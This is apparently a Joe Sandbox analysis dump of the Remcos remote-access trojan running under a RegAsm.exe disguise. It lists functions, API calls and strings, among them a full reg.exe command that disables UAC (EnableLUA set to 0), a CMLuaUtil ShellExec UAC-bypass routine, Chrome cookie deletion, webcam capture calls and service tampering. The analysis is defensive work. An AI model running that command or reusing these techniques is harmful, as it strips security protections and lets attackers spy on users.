_free.LIBCMT ref: 00450FB2
_free.LIBCMT ref: 00450FBD
_free.LIBCMT ref: 00450FC8
_free.LIBCMT ref: 00450FD3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

[+] ShellExec success, xrefs: 0040760E
[+] before ShellExec, xrefs: 004075F1
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004075B0, 004075B3, 00407605

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-1839356972
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
GetLastError.KERNEL32 ref: 0040BAE7

Strings

[Chrome Cookies not found], xrefs: 0040BB01
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
UserProfile, xrefs: 0040BAAD
[Chrome Cookies found, cleared!], xrefs: 0040BB0D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE

Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32 ref: 0041CDA4
ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

CONOUT$, xrefs: 0041CDD0
4.9.4 Pro, xrefs: 0041CE0B
Remcos v, xrefs: 0041CDFD

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$4.9.4 Pro$CONOUT$
API String ID: 2425139147-3065609815
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E

Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
__allrem.LIBCMT ref: 0043AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
__allrem.LIBCMT ref: 0043ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,0040D262), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

OpenCamera, xrefs: 00404582
CloseCamera, xrefs: 0040458E
GetFrame, xrefs: 0040459F
FreeFrame, xrefs: 004045B0
HNG, xrefs: 004045E6

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9

Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A

Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9

Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9

Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9

Function 00443435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

82o, xrefs: 0044347B
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: 82o$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 2506810119-2888157255
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32 ref: 0041D55B
CreateWindowExA.USER32 ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

MsgWindowClass, xrefs: 0041D526
0, xrefs: 0041D52B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
C:\Windows\System32\cmd.exe, xrefs: 00407796

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

SG, xrefs: 004076DA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 0-643455097
Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390

Strings

CorExitProcess, xrefs: 00443365
mscoree.dll, xrefs: 00443353

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
Sleep.KERNEL32(00002710), ref: 0041AE07
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10

Strings

Alarm triggered, xrefs: 0041ADC9

Memory Dump Source

